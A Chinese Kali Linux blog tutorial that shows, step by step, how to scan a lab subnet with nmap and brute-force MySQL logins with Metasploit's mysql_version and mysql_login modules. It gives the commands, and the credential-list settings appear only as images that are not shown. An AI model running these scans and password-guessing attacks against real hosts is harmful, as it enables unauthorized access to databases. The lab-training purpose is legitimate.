白帽***教Kali Linux:原来数据库的密码能这样被攻陷

不想你离开。 提交于 2020-10-24 07:29:25

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。那么如何利用Metasploit(msf)进行Mysql弱口令爆破呢?接下来让我们一起学习!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.搭建好Sql server的靶机一个;
3.整装待发的小白一个。
三、战略安排
3.1 设置受害者靶机跟***者主机的网络模式为NAT模式,如下图所示。
在这里插入图片描述












3.2 查看受害者主机的IP地址,如下图所示。
命令:ifconfig
在这里插入图片描述

3.3 针对目标受害者主机进行信息收集,如下图所示。
命令:nmap -sV IP
例子:nmap -sV 192.168.126.170-200
在这里插入图片描述


3.4 扫描结果如下图所示,目标***者主机开启了3306危险端口。
在这里插入图片描述

3.5 利用Metasploit(msf)***框架对目标主机进行信息收集,如下图所示。
命令:msfconsole
在这里插入图片描述

3.6 利用msf检索SQL相关***模块,如下图所示。
命令:search mysql_version
在这里插入图片描述

3.7 利用检索到的漏洞利用模块,如下图所示。
命令:use auxiliary/scanner/mysql/mysql_version
在这里插入图片描述

3.8 查看相关参数,如下图所示。
命令:show options
在这里插入图片描述

3.9 设置参数,如下图所示。
命令:set rhosts 192.168.126.170-200
命令:set threads 50
在这里插入图片描述
在这里插入图片描述



3.10 运行***模块,如下图所示。
命令:run
在这里插入图片描述

3.11 返回上层目录,如下图所示。
命令:back
在这里插入图片描述

3.12 检索数据库***模块,如下图所示。
命令:search mysql_login
在这里插入图片描述

3.13 利用检索到的***模块,如下图所示。
命令:use auxiliary/scanner/mysql/mysql_login
在这里插入图片描述

3.14 查看相关参数,如下图所示。
命令:show options
在这里插入图片描述
在这里插入图片描述


3.15 设置相关参数,如下图所示。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述



3.16 设置好参数进行***,如下图所示。
命令:run
在这里插入图片描述
辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux ***与白帽编程技巧呢!
点我学习更多Kali Linux***测试与网络***实战技巧!



标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!